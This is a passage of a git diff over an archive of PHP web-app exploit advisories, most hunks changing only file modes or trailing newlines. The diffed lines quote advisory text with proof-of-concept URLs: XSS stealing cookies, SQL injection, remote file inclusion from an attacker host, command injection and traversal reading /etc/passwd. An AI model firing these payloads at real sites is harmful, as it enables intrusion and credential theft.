+http://www.example.com/default.php?manufacturers_id="><iframe src=http://www.gulftech.org> \ No newline at end of file diff --git a/platforms/php/webapps/2347.txt b/platforms/php/webapps/2347.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23473.txt b/platforms/php/webapps/23473.txt old mode 100755 new mode 100644 index b35231ec4..dd3f445d7 --- a/platforms/php/webapps/23473.txt +++ b/platforms/php/webapps/23473.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9286/info my little forum is prone to a cross-site scripting vulnerability in the 'email.php' script. The source of the problem is that HTML and script code are not adequately sanitized from input supplied via the URI parameters. A remote attacker could exploit this issue by embedding hostile HTML and script code in a malicious link to the vulnerable script. -http://www.example.com/forum/email.php?forum_contact="><script>alert(document.domain);</script> \ No newline at end of file +http://www.example.com/forum/email.php?forum_contact="><script>alert(document.domain);</script> \ No newline at end of file diff --git a/platforms/php/webapps/23474.txt b/platforms/php/webapps/23474.txt old mode 100755 new mode 100644 index 73dac8456..42ba2c5a8 --- a/platforms/php/webapps/23474.txt +++ b/platforms/php/webapps/23474.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9289/info Webfroot Shoutbox is prone to a cross-site scripting vulnerability in the 'viewshoutbox.php' script. The source of the problem is that HTML and script code are not adequately sanitized from input supplied via URI parameters. This input will be included in dynamically generated web pages. A remote attacker could exploit this issue by embedding hostile HTML and script code in a malicious link to the vulnerable script. The attacker-supplied code will be interpreted in the context of the site hosting the vulnerable software. -http://www.example.com/shoutbox/viewshoutbox.php?error="><script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/shoutbox/viewshoutbox.php?error="><script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/23475.txt b/platforms/php/webapps/23475.txt old mode 100755 new mode 100644 index bb0f161f0..941c80492 --- a/platforms/php/webapps/23475.txt +++ b/platforms/php/webapps/23475.txt @@ -6,4 +6,4 @@ http://www.example.com/forums/privmsg.php?mode=""><script>alert(document.cookie) t>post&u=2 William Heatley has supplied the following proof of concept: -http://www.example.com/phpBB/privmsg.php?mode=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C \ No newline at end of file +http://www.example.com/phpBB/privmsg.php?mode=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C \ No newline at end of file diff --git a/platforms/php/webapps/23476.txt b/platforms/php/webapps/23476.txt old mode 100755 new mode 100644 index 1fa486d68..293b3cfa8 --- a/platforms/php/webapps/23476.txt +++ b/platforms/php/webapps/23476.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9292/info KnowledgeBuilder is prone to a remote file include vulnerability. An attacker could exploit this to cause hostile PHP scripts to be included and executed from a remote server. This would occur in the security context of the web server hosting the software. -http://www.example.com/kb/index.php?page=http://[attacker's_host]/[attacker's_script] \ No newline at end of file +http://www.example.com/kb/index.php?page=http://[attacker's_host]/[attacker's_script] \ No newline at end of file diff --git a/platforms/php/webapps/23477.txt b/platforms/php/webapps/23477.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23478.txt b/platforms/php/webapps/23478.txt old mode 100755 new mode 100644 index 96f0935f8..d30669c98 --- a/platforms/php/webapps/23478.txt +++ b/platforms/php/webapps/23478.txt @@ -4,4 +4,4 @@ It has been reported that Psychoblogger may be prone to multiple cross-site scri Psychoblogger version PB-beta1 has been reported to be prone to these issues, however, other versions could be affected as well. -http://www.example.com/entryadmin.php?error=1&errormessage=<script>alert('xss')</script> \ No newline at end of file +http://www.example.com/entryadmin.php?error=1&errormessage=<script>alert('xss')</script> \ No newline at end of file diff --git a/platforms/php/webapps/23483.txt b/platforms/php/webapps/23483.txt old mode 100755 new mode 100644 index 6da89c0d9..36cb53f8a --- a/platforms/php/webapps/23483.txt +++ b/platforms/php/webapps/23483.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9303/info OpenBB is prone to a cross-site scripting vulnerability in the 'board.php' script. The source of the problem is that HTML and script code are not adequately sanitized from input supplied via URI parameters. This input will be included in dynamically generated web pages. A remote attacker could exploit this issue by embedding hostile HTML and script code in a malicious link to the vulnerable script. -http://www.example.com/board.php?FID=%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/board.php?FID=%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/23484.txt b/platforms/php/webapps/23484.txt old mode 100755 new mode 100644 index 11bc5409f..ebba3f211 --- a/platforms/php/webapps/23484.txt +++ b/platforms/php/webapps/23484.txt @@ -4,4 +4,4 @@ A vulnerability has been reported to exist in the Survey module of PHP-Nuke that A malicious user may influence database queries in order to view or modify sensitive information, potentially compromising the software or the database. -http://www.example.com/php-nuke/modules.php?name=Surveys&pollID=a'[sql_code_here] \ No newline at end of file +http://www.example.com/php-nuke/modules.php?name=Surveys&pollID=a'[sql_code_here] \ No newline at end of file diff --git a/platforms/php/webapps/23486.txt b/platforms/php/webapps/23486.txt old mode 100755 new mode 100644 index fe96d2daf..c697b9694 --- a/platforms/php/webapps/23486.txt +++ b/platforms/php/webapps/23486.txt @@ -4,4 +4,4 @@ Private Message System is prone to a cross-site scripting vulnerability. This is Possible consequences of exploitation include theft of cookie-based authentication credentials or using the issue as an attack vector to exploit latent web browser security flaws. -http://www.example.com/index.php?page=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E \ No newline at end of file +http://www.example.com/index.php?page=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/23487.txt b/platforms/php/webapps/23487.txt old mode 100755 new mode 100644 index 2f38b15e8..45334d164 --- a/platforms/php/webapps/23487.txt +++ b/platforms/php/webapps/23487.txt @@ -6,4 +6,4 @@ metacharacters via the 'count' parameter of php-ping.php script. Exploitation would permit a remote attacker to execute arbitrary commands with the privileges of the web server hosting the vulnerable software. http://www.example.com/php-ping.php?count=1+%26+ls%20-l+%26&submit=Ping%21 -http://www.example.com/php-ping.php?count=1+%26+cat%20/etc/passwd+%26&submit=Ping%21 \ No newline at end of file +http://www.example.com/php-ping.php?count=1+%26+cat%20/etc/passwd+%26&submit=Ping%21 \ No newline at end of file diff --git a/platforms/php/webapps/2349.txt b/platforms/php/webapps/2349.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23494.txt b/platforms/php/webapps/23494.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2350.txt b/platforms/php/webapps/2350.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23507.txt b/platforms/php/webapps/23507.txt old mode 100755 new mode 100644 index 0327ae050..5ac73a7c1 --- a/platforms/php/webapps/23507.txt +++ b/platforms/php/webapps/23507.txt @@ -6,4 +6,4 @@ http://www.example.com/dynamicpages/fast/config_page.php?do=add_page&du=site&edp The attacker must have a malicious script hosted at the following location: -http://[attacker's_site]/admin/site_settings.php \ No newline at end of file +http://[attacker's_site]/admin/site_settings.php \ No newline at end of file diff --git a/platforms/php/webapps/2351.txt b/platforms/php/webapps/2351.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23513.txt b/platforms/php/webapps/23513.txt old mode 100755 new mode 100644 index 8fdce7162..cbdf7965a --- a/platforms/php/webapps/23513.txt +++ b/platforms/php/webapps/23513.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9349/info A problem has been reported in the handling of user-supplied input by the Athena Web Registration scripts. Because of this, it may be possible for an attacker to gain unauthorized access to a vulnerable system. -http://www.example.com/athenareg.php?pass=%20;whoami \ No newline at end of file +http://www.example.com/athenareg.php?pass=%20;whoami \ No newline at end of file diff --git a/platforms/php/webapps/23517.txt b/platforms/php/webapps/23517.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23518.txt b/platforms/php/webapps/23518.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23519.txt b/platforms/php/webapps/23519.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2352.txt b/platforms/php/webapps/2352.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23520.txt b/platforms/php/webapps/23520.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23525.txt b/platforms/php/webapps/23525.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23526.txt b/platforms/php/webapps/23526.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2353.txt b/platforms/php/webapps/2353.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23536.txt b/platforms/php/webapps/23536.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23537.txt b/platforms/php/webapps/23537.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2354.txt b/platforms/php/webapps/2354.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23546.txt b/platforms/php/webapps/23546.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23553.php b/platforms/php/webapps/23553.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23554.java b/platforms/php/webapps/23554.java old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23558.txt b/platforms/php/webapps/23558.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2356.txt b/platforms/php/webapps/2356.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2357.txt b/platforms/php/webapps/2357.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23573.txt b/platforms/php/webapps/23573.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23575.txt b/platforms/php/webapps/23575.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2359.txt b/platforms/php/webapps/2359.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23599.txt b/platforms/php/webapps/23599.txt old mode 100755 new mode 100644 index 0e49be668..3b4336823 --- a/platforms/php/webapps/23599.txt +++ b/platforms/php/webapps/23599.txt @@ -4,4 +4,4 @@ It has been reported that Gallery is prone to a vulnerability that may allow a r The vendor has reported that this issue exists in Gallery versions 1.3.1, 1.3.2, 1.3.3, 1.4 and 1.4.1. -http://www.example.com/gallery/init.php?HTTP_POST_VARS=xxx \ No newline at end of file +http://www.example.com/gallery/init.php?HTTP_POST_VARS=xxx \ No newline at end of file diff --git a/platforms/php/webapps/23606.txt b/platforms/php/webapps/23606.txt old mode 100755 new mode 100644 index 701b71086..001e75852 --- a/platforms/php/webapps/23606.txt +++ b/platforms/php/webapps/23606.txt @@ -7,4 +7,4 @@ Successful exploitation of this attack may allow an attacker to steal cookie-bas Xoops versions 2.x have been reported to be prone to this issue. http://www.example.org/modules/newbb/viewtopic.php?topic_id=14577&forum=2"><script>alert(document.cookie);</script> -http://www.example.org/modules/newbb/viewtopic.php?topic_id=14577"><script>alert(document.cookie);</script>&forum=2 \ No newline at end of file +http://www.example.org/modules/newbb/viewtopic.php?topic_id=14577"><script>alert(document.cookie);</script>&forum=2 \ No newline at end of file diff --git a/platforms/php/webapps/23607.txt b/platforms/php/webapps/23607.txt old mode 100755 new mode 100644 index 803cdad68..cc227b983 --- a/platforms/php/webapps/23607.txt +++ b/platforms/php/webapps/23607.txt @@ -8,4 +8,4 @@ http://www.example.com/index.php?kietu[url_hit]=http://[attacker]/ Where the 'config.php' file must exist: -http://[attacker]/config.php \ No newline at end of file +http://[attacker]/config.php \ No newline at end of file diff --git a/platforms/php/webapps/2361.txt b/platforms/php/webapps/2361.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23616.txt b/platforms/php/webapps/23616.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23617.txt b/platforms/php/webapps/23617.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23618.txt b/platforms/php/webapps/23618.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23619.txt b/platforms/php/webapps/23619.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23620.txt b/platforms/php/webapps/23620.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23621.txt b/platforms/php/webapps/23621.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23623.txt b/platforms/php/webapps/23623.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23624.txt b/platforms/php/webapps/23624.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23625.txt b/platforms/php/webapps/23625.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23628.txt b/platforms/php/webapps/23628.txt old mode 100755 new mode 100644 index fa74089c6..04a0d0d03 --- a/platforms/php/webapps/23628.txt +++ b/platforms/php/webapps/23628.txt @@ -4,4 +4,4 @@ Due to a lack of access validation to the '_admin' directory, malevolent users m http://www.example.org/_admin/ http://www.example.org/_admin/list_all.php?folder=../ -http://www.example.org/_admin/upload.php \ No newline at end of file +http://www.example.org/_admin/upload.php \ No newline at end of file diff --git a/platforms/php/webapps/2363.tt b/platforms/php/webapps/2363.tt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23630.txt b/platforms/php/webapps/23630.txt old mode 100755 new mode 100644 index 9319ecbb2..499380bf4 --- a/platforms/php/webapps/23630.txt +++ b/platforms/php/webapps/23630.txt @@ -4,4 +4,4 @@ Aprox Portal is prone to a vulnerability that may permit remote attackers to gai This could expose sensitive information that may be useful in further attacks against the host. -http://www.example.com/index.php?show=/etc/passwd \ No newline at end of file +http://www.example.com/index.php?show=/etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/23631.txt b/platforms/php/webapps/23631.txt old mode 100755 new mode 100644 index 6871de98e..5de3f980f --- a/platforms/php/webapps/23631.txt +++ b/platforms/php/webapps/23631.txt @@ -131,4 +131,4 @@ For more informations about this exploit : target="_blank"> Security-Corporation.com</a></p> </body> </html> ---------------------PHPNUKEexploit3.html-------------------- \ No newline at end of file +--------------------PHPNUKEexploit3.html-------------------- \ No newline at end of file diff --git a/platforms/php/webapps/23636.txt b/platforms/php/webapps/23636.txt old mode 100755 new mode 100644 index 09a04608d..0c4fa990a --- a/platforms/php/webapps/23636.txt +++ b/platforms/php/webapps/23636.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9560/info X-Cart has been reported to be prone to an issue that may allow remote attackers to execute arbitrary commands on the affected system. The issue is caused by a failure of the application to sanitize values specified by parameters in the URI. -http://server/admin/general.php?mode=perlinfo&config[General][perl_binary]=/bin/ls -lR || \ No newline at end of file +http://server/admin/general.php?mode=perlinfo&config[General][perl_binary]=/bin/ls -lR || \ No newline at end of file diff --git a/platforms/php/webapps/23637.txt b/platforms/php/webapps/23637.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23639.txt b/platforms/php/webapps/23639.txt old mode 100755 new mode 100644 index ae6c64f27..864822f55 --- a/platforms/php/webapps/23639.txt +++ b/platforms/php/webapps/23639.txt @@ -4,4 +4,4 @@ X-Cart has been reported to be prone to an issue that may allow remote attackers It has been reported that there is also an information disclosure issue with the 'general.php' script that resides in the 'admin' directory of the application. The 'mode' URI parameter can be set to request information on the current PHP and Perl software versions, allowing potential attackers the gain access to sensitive system details. -http://servername/customer/auth.php?config[General][shop_closed]=Y&shop_closed_file=../../../../../../../etc/passwd \ No newline at end of file +http://servername/customer/auth.php?config[General][shop_closed]=Y&shop_closed_file=../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/2364.txt b/platforms/php/webapps/2364.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23640.txt b/platforms/php/webapps/23640.txt old mode 100755 new mode 100644 index fa1c80ef0..097942815 --- a/platforms/php/webapps/23640.txt +++ b/platforms/php/webapps/23640.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9564/info phpMyAdmin is prone to a vulnerability that may permit remote attackers to gain access to files that are readable by the hosting web server. The issue is reported to exist in the 'export.php' script and may be exploited by providing directory traversal sequences as an argument for a specific URI parameter. -http://www.example.com/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/23644.php b/platforms/php/webapps/23644.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23645.txt b/platforms/php/webapps/23645.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23646.txt b/platforms/php/webapps/23646.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2365.txt b/platforms/php/webapps/2365.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23653.txt b/platforms/php/webapps/23653.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23657.txt b/platforms/php/webapps/23657.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2366.txt b/platforms/php/webapps/2366.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23663.txt b/platforms/php/webapps/23663.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23669.txt b/platforms/php/webapps/23669.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2367.txt b/platforms/php/webapps/2367.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23673.txt b/platforms/php/webapps/23673.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2368.txt b/platforms/php/webapps/2368.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23680.php b/platforms/php/webapps/23680.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23683.txt b/platforms/php/webapps/23683.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23684.txt b/platforms/php/webapps/23684.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23685.txt b/platforms/php/webapps/23685.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23687.txt b/platforms/php/webapps/23687.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23688.txt b/platforms/php/webapps/23688.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2369.txt b/platforms/php/webapps/2369.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23691.txt b/platforms/php/webapps/23691.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23697.txt b/platforms/php/webapps/23697.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23698.txt b/platforms/php/webapps/23698.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23699.txt b/platforms/php/webapps/23699.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2370.php b/platforms/php/webapps/2370.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23710.txt b/platforms/php/webapps/23710.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23711.txt b/platforms/php/webapps/23711.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23712.txt b/platforms/php/webapps/23712.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23718.txt b/platforms/php/webapps/23718.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23719.txt b/platforms/php/webapps/23719.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2372.txt b/platforms/php/webapps/2372.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23720.txt b/platforms/php/webapps/23720.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23722.txt b/platforms/php/webapps/23722.txt old mode 100755 new mode 100644 index d6c4e2043..fd734aa0e --- a/platforms/php/webapps/23722.txt +++ b/platforms/php/webapps/23722.txt @@ -4,4 +4,4 @@ Owl's Workshop is reported prone to multiple remote file-disclosure vulnerabilit Upon successful exploitation of these issues, an attacker may be able to gain access to sensitive system files, potentially facilitating further attacks. -http://www.example.org/owls/multiplechoice/index.php?file=../../../../../../../../../../../../../../../etc/passwd&view=print \ No newline at end of file +http://www.example.org/owls/multiplechoice/index.php?file=../../../../../../../../../../../../../../../etc/passwd&view=print \ No newline at end of file diff --git a/platforms/php/webapps/23723.txt b/platforms/php/webapps/23723.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23724.txt b/platforms/php/webapps/23724.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23725.txt b/platforms/php/webapps/23725.txt old mode 100755 new mode 100644 index 936b4260b..d045caf03 --- a/platforms/php/webapps/23725.txt +++ b/platforms/php/webapps/23725.txt @@ -4,4 +4,4 @@ Owl's Workshop is reported prone to multiple remote file-disclosure vulnerabilit Upon successful exploitation of these issues, an attacker may be able to gain access to sensitive system files, potentially facilitating further attacks. -http://www.example.org/owls/glossaries/index.php?file=/etc/passwd \ No newline at end of file +http://www.example.org/owls/glossaries/index.php?file=/etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/23726.txt b/platforms/php/webapps/23726.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23727.txt b/platforms/php/webapps/23727.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2373.txt b/platforms/php/webapps/2373.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23742.txt b/platforms/php/webapps/23742.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23744.txt b/platforms/php/webapps/23744.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23745.txt b/platforms/php/webapps/23745.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23746.txt b/platforms/php/webapps/23746.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23747.txt b/platforms/php/webapps/23747.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23748.txt b/platforms/php/webapps/23748.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23749.txt b/platforms/php/webapps/23749.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2375.txt b/platforms/php/webapps/2375.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23753.txt b/platforms/php/webapps/23753.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23767.txt b/platforms/php/webapps/23767.txt old mode 100755 new mode 100644 index 58410dba6..c4add0d76 --- a/platforms/php/webapps/23767.txt +++ b/platforms/php/webapps/23767.txt @@ -10,4 +10,4 @@ http://www.example.com/?c='><script>alert(window.document.url)</script><plaintex http://www.example.com/?act=SR&f='><script>alert(document.cookie)</script> http://www.example.com/?showuser='><script>alert(document.cookie)</script> http://www.example.com/index.php?act=Reg&CODE=2&coppa_user=0&UserName='><script>alert -(document.cookie)</script> \ No newline at end of file +(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/2377.txt b/platforms/php/webapps/2377.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23770.txt b/platforms/php/webapps/23770.txt old mode 100755 new mode 100644 index 82c56afec..793b0e686 --- a/platforms/php/webapps/23770.txt +++ b/platforms/php/webapps/23770.txt @@ -4,4 +4,4 @@ It has been reported that iGeneric Free Shopping Cart is prone to an SQL injecti As a result of this issue a malicious user may influence database queries in order to view or modify sensitive information, potentially compromising the software or the database. It has been conjectured that an attacker may be able to disclose user password hashes by exploiting this issue. This issue may also be leveraged to exploit latent vulnerabilities within the database itself. -page.php?page_type=catalog_products&type_id[]='[SQL-Injection]&SESSION_ID={SESSION_ID}&SESSION_ID= \ No newline at end of file +page.php?page_type=catalog_products&type_id[]='[SQL-Injection]&SESSION_ID={SESSION_ID}&SESSION_ID= \ No newline at end of file diff --git a/platforms/php/webapps/23773.txt b/platforms/php/webapps/23773.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23774.txt b/platforms/php/webapps/23774.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23775.txt b/platforms/php/webapps/23775.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2378.php b/platforms/php/webapps/2378.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23781.txt b/platforms/php/webapps/23781.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23782.txt b/platforms/php/webapps/23782.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2379.txt b/platforms/php/webapps/2379.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23792.txt b/platforms/php/webapps/23792.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23795.txt b/platforms/php/webapps/23795.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23797.txt b/platforms/php/webapps/23797.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23798.txt b/platforms/php/webapps/23798.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2380.txt b/platforms/php/webapps/2380.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2381.txt b/platforms/php/webapps/2381.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23812.txt b/platforms/php/webapps/23812.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23814.txt b/platforms/php/webapps/23814.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23815.txt b/platforms/php/webapps/23815.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23816.txt b/platforms/php/webapps/23816.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23817.txt b/platforms/php/webapps/23817.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23818.txt b/platforms/php/webapps/23818.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23819.txt b/platforms/php/webapps/23819.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23820.txt b/platforms/php/webapps/23820.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23821.php b/platforms/php/webapps/23821.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23822.txt b/platforms/php/webapps/23822.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23823.txt b/platforms/php/webapps/23823.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23824.txt b/platforms/php/webapps/23824.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23825.txt b/platforms/php/webapps/23825.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23828.txt b/platforms/php/webapps/23828.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23829.txt b/platforms/php/webapps/23829.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2383.txt b/platforms/php/webapps/2383.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23834.txt b/platforms/php/webapps/23834.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23835.txt b/platforms/php/webapps/23835.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23843.txt b/platforms/php/webapps/23843.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23844.txt b/platforms/php/webapps/23844.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23845.txt b/platforms/php/webapps/23845.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23865.txt b/platforms/php/webapps/23865.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23866.txt b/platforms/php/webapps/23866.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23867.txt b/platforms/php/webapps/23867.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23868.txt b/platforms/php/webapps/23868.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23869.txt b/platforms/php/webapps/23869.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23870.txt b/platforms/php/webapps/23870.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2388.txt b/platforms/php/webapps/2388.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23885.txt b/platforms/php/webapps/23885.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23888.txt b/platforms/php/webapps/23888.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2390.txt b/platforms/php/webapps/2390.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23901.txt b/platforms/php/webapps/23901.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23908.txt b/platforms/php/webapps/23908.txt old mode 100755 new mode 100644 index 2ded70e9f..331601040 --- a/platforms/php/webapps/23908.txt +++ b/platforms/php/webapps/23908.txt @@ -4,4 +4,4 @@ It has been reported that OpenBB is prone to a vulnerability that may allow mali This may allow a remote attacker to manipulate query logic, potentially leading to access to sensitive information such as the administrator password hash or corruption of database data. SQL injection attacks may also potentially be used to exploit latent vulnerabilities in the underlying database implementation. -http://www.example.com/myhome.php?action=readmsg&id=1[SQL CODE] \ No newline at end of file +http://www.example.com/myhome.php?action=readmsg&id=1[SQL CODE] \ No newline at end of file diff --git a/platforms/php/webapps/2391.php b/platforms/php/webapps/2391.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2392.txt b/platforms/php/webapps/2392.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23928.txt b/platforms/php/webapps/23928.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23929.txt b/platforms/php/webapps/23929.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2393.txt b/platforms/php/webapps/2393.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23930.txt b/platforms/php/webapps/23930.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23931.txt b/platforms/php/webapps/23931.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23932.txt b/platforms/php/webapps/23932.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23933.txt 